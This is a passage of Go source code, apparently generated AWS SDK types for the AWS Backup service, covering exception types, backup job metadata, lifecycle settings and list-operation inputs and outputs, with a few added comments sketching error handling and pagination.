// SetResourceTypes sets the ResourceTypes field's value.
func (s *GetSupportedResourceTypesOutput) SetResourceTypes(v []*string) *GetSupportedResourceTypesOutput {
s.ResourceTypes = v
return s
}
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
type InvalidParameterValueException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s InvalidParameterValueException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s InvalidParameterValueException) GoString() string {
return s.String()
}
func newErrorInvalidParameterValueException(v protocol.ResponseMetadata) error {
return &InvalidParameterValueException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *InvalidParameterValueException) Code() string {
return "InvalidParameterValueException"
}
// Message returns the exception's message.
func (s *InvalidParameterValueException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *InvalidParameterValueException) OrigErr() error {
return nil
}
func (s *InvalidParameterValueException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *InvalidParameterValueException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *InvalidParameterValueException) RequestID() string {
return s.RespMetadata.RequestID
}
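// exampleHandleError is a usage sketch, not generated API code. It shows one
// way callers can distinguish the modeled error types defined in this file,
// assuming (as with other SDK modeled errors) that operations return these
// concrete types as error values: a type switch recovers the HTTP status
// code, request ID, and message. The err argument stands in for any error
// returned by a Backup operation.
func exampleHandleError(err error) {
	switch e := err.(type) {
	case *InvalidParameterValueException:
		fmt.Printf("bad parameter (HTTP %d, request %s): %s\n",
			e.StatusCode(), e.RequestID(), e.Message())
	case *InvalidRequestException:
		fmt.Printf("bad request: %s\n", e.Message())
	default:
		// Not a modeled Backup error; fall back to the generic message.
		if err != nil {
			fmt.Println(err)
		}
	}
}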
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
type InvalidRequestException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s InvalidRequestException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s InvalidRequestException) GoString() string {
return s.String()
}
func newErrorInvalidRequestException(v protocol.ResponseMetadata) error {
return &InvalidRequestException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *InvalidRequestException) Code() string {
return "InvalidRequestException"
}
// Message returns the exception's message.
func (s *InvalidRequestException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *InvalidRequestException) OrigErr() error {
return nil
}
func (s *InvalidRequestException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *InvalidRequestException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *InvalidRequestException) RequestID() string {
return s.RespMetadata.RequestID
}
// AWS Backup is already performing an action on this recovery point. It can't
// perform the action you requested until the first action finishes. Try again
// later.
type InvalidResourceStateException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s InvalidResourceStateException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s InvalidResourceStateException) GoString() string {
return s.String()
}
func newErrorInvalidResourceStateException(v protocol.ResponseMetadata) error {
return &InvalidResourceStateException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *InvalidResourceStateException) Code() string {
return "InvalidResourceStateException"
}
// Message returns the exception's message.
func (s *InvalidResourceStateException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *InvalidResourceStateException) OrigErr() error {
return nil
}
func (s *InvalidResourceStateException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *InvalidResourceStateException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *InvalidResourceStateException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains detailed information about a backup job.
type Job struct {
_ struct{} `type:"structure"`
// The account ID that owns the backup job.
AccountId *string `type:"string"`
// Uniquely identifies a request to AWS Backup to back up a resource.
BackupJobId *string `type:"string"`
// Specifies the backup option for a selected resource. This option is only
// available for Windows VSS backup jobs.
//
// Valid values: Set to "WindowsVSS":"enabled" to enable the WindowsVSS backup
// option and create a Windows VSS backup. Set to "WindowsVSS":"disabled" to
// create a regular backup. If you specify an invalid option, you get an
// InvalidParameterValueException exception.
BackupOptions map[string]*string `type:"map"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// Represents the type of backup for a backup job.
BackupType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The size in bytes transferred to a backup vault at the time that the job
// status was queried.
BytesTransferred *int64 `type:"long"`
// The date and time a job to create a backup job is completed, in Unix format
// and Coordinated Universal Time (UTC). The value of CompletionDate is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a backup job, including
// the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId of the
// backup plan used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time a backup job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The date and time a job to back up resources is expected to be completed,
// in Unix format and Coordinated Universal Time (UTC). The value of ExpectedCompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
ExpectedCompletionDate *time.Time `type:"timestamp"`
// Specifies the IAM role ARN used to create the target recovery point. IAM
// roles other than the default role must include either AWSBackup or AwsBackup
// in the role name. For example, arn:aws:iam::123456789012:role/AWSBackupRDSAccess.
// Role names without those strings lack permissions to perform backup jobs.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage complete of a job at the time the job status
// was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource to be backed up; for example, an Amazon Elastic
// Block Store (Amazon EBS) volume or an Amazon Relational Database Service
// (Amazon RDS) database. For VSS Windows backups, the only supported resource
// type is Amazon EC2.
ResourceType *string `type:"string"`
// Specifies the time in Unix format and Coordinated Universal Time (UTC) when
// a backup job must be started before it is canceled. The value is calculated
// by adding the start window to the scheduled time. So if the scheduled time
// is 6:00 PM and the start window is 2 hours, the StartBy time would be 8:00
// PM on the date specified. The value of StartBy is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
StartBy *time.Time `type:"timestamp"`
// The current state of a resource recovery point.
State *string `type:"string" enum:"JobState"`
// A detailed message explaining the status of the job to back up a resource.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s Job) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Job) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *Job) SetAccountId(v string) *Job {
s.AccountId = &v
return s
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *Job) SetBackupJobId(v string) *Job {
s.BackupJobId = &v
return s
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *Job) SetBackupOptions(v map[string]*string) *Job {
s.BackupOptions = v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *Job) SetBackupSizeInBytes(v int64) *Job {
s.BackupSizeInBytes = &v
return s
}
// SetBackupType sets the BackupType field's value.
func (s *Job) SetBackupType(v string) *Job {
s.BackupType = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *Job) SetBackupVaultArn(v string) *Job {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *Job) SetBackupVaultName(v string) *Job {
s.BackupVaultName = &v
return s
}
// SetBytesTransferred sets the BytesTransferred field's value.
func (s *Job) SetBytesTransferred(v int64) *Job {
s.BytesTransferred = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *Job) SetCompletionDate(v time.Time) *Job {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *Job) SetCreatedBy(v *RecoveryPointCreator) *Job {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *Job) SetCreationDate(v time.Time) *Job {
s.CreationDate = &v
return s
}
// SetExpectedCompletionDate sets the ExpectedCompletionDate field's value.
func (s *Job) SetExpectedCompletionDate(v time.Time) *Job {
s.ExpectedCompletionDate = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *Job) SetIamRoleArn(v string) *Job {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *Job) SetPercentDone(v string) *Job {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *Job) SetRecoveryPointArn(v string) *Job {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *Job) SetResourceArn(v string) *Job {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *Job) SetResourceType(v string) *Job {
s.ResourceType = &v
return s
}
// SetStartBy sets the StartBy field's value.
func (s *Job) SetStartBy(v time.Time) *Job {
s.StartBy = &v
return s
}
// SetState sets the State field's value.
func (s *Job) SetState(v string) *Job {
s.State = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *Job) SetStatusMessage(v string) *Job {
s.StatusMessage = &v
return s
}
// Contains an array of Transition objects specifying how long in days before
// a recovery point transitions to cold storage or is deleted.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, on the console, the “expire after days”
// setting must be 90 days greater than the “transition to cold after days”
// setting. The “transition to cold after days” setting cannot be changed
// after a backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
type Lifecycle struct {
_ struct{} `type:"structure"`
// Specifies the number of days after creation that a recovery point is deleted.
// Must be greater than 90 days plus MoveToColdStorageAfterDays.
DeleteAfterDays *int64 `type:"long"`
// Specifies the number of days after creation that a recovery point is moved
// to cold storage.
MoveToColdStorageAfterDays *int64 `type:"long"`
}
// String returns the string representation
func (s Lifecycle) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Lifecycle) GoString() string {
return s.String()
}
// SetDeleteAfterDays sets the DeleteAfterDays field's value.
func (s *Lifecycle) SetDeleteAfterDays(v int64) *Lifecycle {
s.DeleteAfterDays = &v
return s
}
// SetMoveToColdStorageAfterDays sets the MoveToColdStorageAfterDays field's value.
func (s *Lifecycle) SetMoveToColdStorageAfterDays(v int64) *Lifecycle {
s.MoveToColdStorageAfterDays = &v
return s
}
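// For illustration only (not generated code): a minimal sketch of a Lifecycle
// that satisfies the cold-storage constraint described above. The values are
// hypothetical; DeleteAfterDays must be at least 90 days greater than
// MoveToColdStorageAfterDays.
//
//	lifecycle := (&backup.Lifecycle{}).
//		SetMoveToColdStorageAfterDays(30). // transition to cold storage after 30 days
//		SetDeleteAfterDays(120)            // earliest allowed deletion: 30 + 90 days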
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
type LimitExceededException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s LimitExceededException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s LimitExceededException) GoString() string {
return s.String()
}
func newErrorLimitExceededException(v protocol.ResponseMetadata) error {
return &LimitExceededException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *LimitExceededException) Code() string {
return "LimitExceededException"
}
// Message returns the exception's message.
func (s *LimitExceededException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *LimitExceededException) OrigErr() error {
return nil
}
func (s *LimitExceededException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *LimitExceededException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *LimitExceededException) RequestID() string {
return s.RespMetadata.RequestID
}
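// A hedged usage sketch (not generated code): callers can detect this
// exception by comparing the awserr.Error code against
// ErrCodeLimitExceededException. The svc client below is assumed to be a
// configured *backup.Backup (svc := backup.New(sess)); awserr comes from
// github.com/aws/aws-sdk-go/aws/awserr.
//
//	_, err := svc.ListBackupJobs(&backup.ListBackupJobsInput{})
//	if aerr, ok := err.(awserr.Error); ok && aerr.Code() == backup.ErrCodeLimitExceededException {
//		log.Printf("limit exceeded: %s", aerr.Message())
//	}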
type ListBackupJobsInput struct {
_ struct{} `type:"structure"`
// The account ID to list the jobs from. Returns only backup jobs associated
// with the specified account ID.
//
// If used from an AWS Organizations management account, passing * returns all
// jobs across the organization.
ByAccountId *string `location:"querystring" locationName:"accountId" type:"string"`
// Returns only backup jobs that will be stored in the specified backup vault.
// Backup vaults are identified by names that are unique to the account used
// to create them and the AWS Region where they are created. They consist of
// lowercase letters, numbers, and hyphens.
ByBackupVaultName *string `location:"querystring" locationName:"backupVaultName" type:"string"`
// Returns only backup jobs that were created after the specified date.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only backup jobs that were created before the specified date.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// Returns only backup jobs that match the specified resource Amazon Resource
// Name (ARN).
ByResourceArn *string `location:"querystring" locationName:"resourceArn" type:"string"`
// Returns only backup jobs for the specified resources:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ByResourceType *string `location:"querystring" locationName:"resourceType" type:"string"`
// Returns only backup jobs that are in the specified state.
ByState *string `location:"querystring" locationName:"state" type:"string" enum:"JobState"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupJobsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupJobsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupJobsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupJobsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetByAccountId sets the ByAccountId field's value.
func (s *ListBackupJobsInput) SetByAccountId(v string) *ListBackupJobsInput {
s.ByAccountId = &v
return s
}
// SetByBackupVaultName sets the ByBackupVaultName field's value.
func (s *ListBackupJobsInput) SetByBackupVaultName(v string) *ListBackupJobsInput {
s.ByBackupVaultName = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListBackupJobsInput) SetByCreatedAfter(v time.Time) *ListBackupJobsInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListBackupJobsInput) SetByCreatedBefore(v time.Time) *ListBackupJobsInput {
s.ByCreatedBefore = &v
return s
}
// SetByResourceArn sets the ByResourceArn field's value.
func (s *ListBackupJobsInput) SetByResourceArn(v string) *ListBackupJobsInput {
s.ByResourceArn = &v
return s
}
// SetByResourceType sets the ByResourceType field's value.
func (s *ListBackupJobsInput) SetByResourceType(v string) *ListBackupJobsInput {
s.ByResourceType = &v
return s
}
// SetByState sets the ByState field's value.
func (s *ListBackupJobsInput) SetByState(v string) *ListBackupJobsInput {
s.ByState = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupJobsInput) SetMaxResults(v int64) *ListBackupJobsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupJobsInput) SetNextToken(v string) *ListBackupJobsInput {
s.NextToken = &v
return s
}
type ListBackupJobsOutput struct {
_ struct{} `type:"structure"`
// An array of structures containing metadata about your backup jobs returned
// in JSON format.
BackupJobs []*Job `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupJobsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupJobsOutput) GoString() string {
return s.String()
}
// SetBackupJobs sets the BackupJobs field's value.
func (s *ListBackupJobsOutput) SetBackupJobs(v []*Job) *ListBackupJobsOutput {
s.BackupJobs = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupJobsOutput) SetNextToken(v string) *ListBackupJobsOutput {
s.NextToken = &v
return s
}
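// A minimal pagination sketch (not generated code), assuming a configured
// client svc := backup.New(sess); the state filter and page size are
// hypothetical. The loop follows NextToken until the list is exhausted.
//
//	input := (&backup.ListBackupJobsInput{}).
//		SetByState(backup.JobStateCompleted).
//		SetMaxResults(50)
//	for {
//		out, err := svc.ListBackupJobs(input)
//		if err != nil {
//			return err
//		}
//		for _, job := range out.BackupJobs {
//			fmt.Println(aws.StringValue(job.BackupJobId))
//		}
//		if out.NextToken == nil {
//			break // no more pages
//		}
//		input.SetNextToken(aws.StringValue(out.NextToken))
//	}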
type ListBackupPlanTemplatesInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupPlanTemplatesInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanTemplatesInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupPlanTemplatesInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupPlanTemplatesInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupPlanTemplatesInput) SetMaxResults(v int64) *ListBackupPlanTemplatesInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanTemplatesInput) SetNextToken(v string) *ListBackupPlanTemplatesInput {
s.NextToken = &v
return s
}
type ListBackupPlanTemplatesOutput struct {
_ struct{} `type:"structure"`
// An array of template list items containing metadata about your saved templates.
BackupPlanTemplatesList []*PlanTemplatesListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupPlanTemplatesOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanTemplatesOutput) GoString() string {
return s.String()
}
// SetBackupPlanTemplatesList sets the BackupPlanTemplatesList field's value.
func (s *ListBackupPlanTemplatesOutput) SetBackupPlanTemplatesList(v []*PlanTemplatesListMember) *ListBackupPlanTemplatesOutput {
s.BackupPlanTemplatesList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanTemplatesOutput) SetNextToken(v string) *ListBackupPlanTemplatesOutput {
s.NextToken = &v
return s
}
type ListBackupPlanVersionsInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupPlanVersionsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanVersionsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupPlanVersionsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupPlanVersionsInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *ListBackupPlanVersionsInput) SetBackupPlanId(v string) *ListBackupPlanVersionsInput {
s.BackupPlanId = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupPlanVersionsInput) SetMaxResults(v int64) *ListBackupPlanVersionsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanVersionsInput) SetNextToken(v string) *ListBackupPlanVersionsInput {
s.NextToken = &v
return s
}
type ListBackupPlanVersionsOutput struct {
_ struct{} `type:"structure"`
// An array of version list items containing metadata about your backup plans.
BackupPlanVersionsList []*PlansListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupPlanVersionsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlanVersionsOutput) GoString() string {
return s.String()
}
// SetBackupPlanVersionsList sets the BackupPlanVersionsList field's value.
func (s *ListBackupPlanVersionsOutput) SetBackupPlanVersionsList(v []*PlansListMember) *ListBackupPlanVersionsOutput {
s.BackupPlanVersionsList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlanVersionsOutput) SetNextToken(v string) *ListBackupPlanVersionsOutput {
s.NextToken = &v
return s
}
type ListBackupPlansInput struct {
_ struct{} `type:"structure"`
// A Boolean value with a default value of FALSE. When set to TRUE, deleted
// backup plans are returned as well.
IncludeDeleted *bool `location:"querystring" locationName:"includeDeleted" type:"boolean"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupPlansInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlansInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupPlansInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupPlansInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetIncludeDeleted sets the IncludeDeleted field's value.
func (s *ListBackupPlansInput) SetIncludeDeleted(v bool) *ListBackupPlansInput {
s.IncludeDeleted = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupPlansInput) SetMaxResults(v int64) *ListBackupPlansInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlansInput) SetNextToken(v string) *ListBackupPlansInput {
s.NextToken = &v
return s
}
type ListBackupPlansOutput struct {
_ struct{} `type:"structure"`
// An array of backup plan list items containing metadata about your saved backup
// plans.
BackupPlansList []*PlansListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupPlansOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupPlansOutput) GoString() string {
return s.String()
}
// SetBackupPlansList sets the BackupPlansList field's value.
func (s *ListBackupPlansOutput) SetBackupPlansList(v []*PlansListMember) *ListBackupPlansOutput {
s.BackupPlansList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupPlansOutput) SetNextToken(v string) *ListBackupPlansOutput {
s.NextToken = &v
return s
}
type ListBackupSelectionsInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupSelectionsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupSelectionsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListBackupSelectionsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupSelectionsInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *ListBackupSelectionsInput) SetBackupPlanId(v string) *ListBackupSelectionsInput {
s.BackupPlanId = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupSelectionsInput) SetMaxResults(v int64) *ListBackupSelectionsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupSelectionsInput) SetNextToken(v string) *ListBackupSelectionsInput {
s.NextToken = &v
return s
}
type ListBackupSelectionsOutput struct {
_ struct{} `type:"structure"`
// An array of backup selection list items containing metadata about each resource
// in the list.
BackupSelectionsList []*SelectionsListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupSelectionsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupSelectionsOutput) GoString() string {
return s.String()
}
// SetBackupSelectionsList sets the BackupSelectionsList field's value.
func (s *ListBackupSelectionsOutput) SetBackupSelectionsList(v []*SelectionsListMember) *ListBackupSelectionsOutput {
s.BackupSelectionsList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupSelectionsOutput) SetNextToken(v string) *ListBackupSelectionsOutput {
s.NextToken = &v
return s
}
type ListBackupVaultsInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListBackupVaultsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupVaultsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
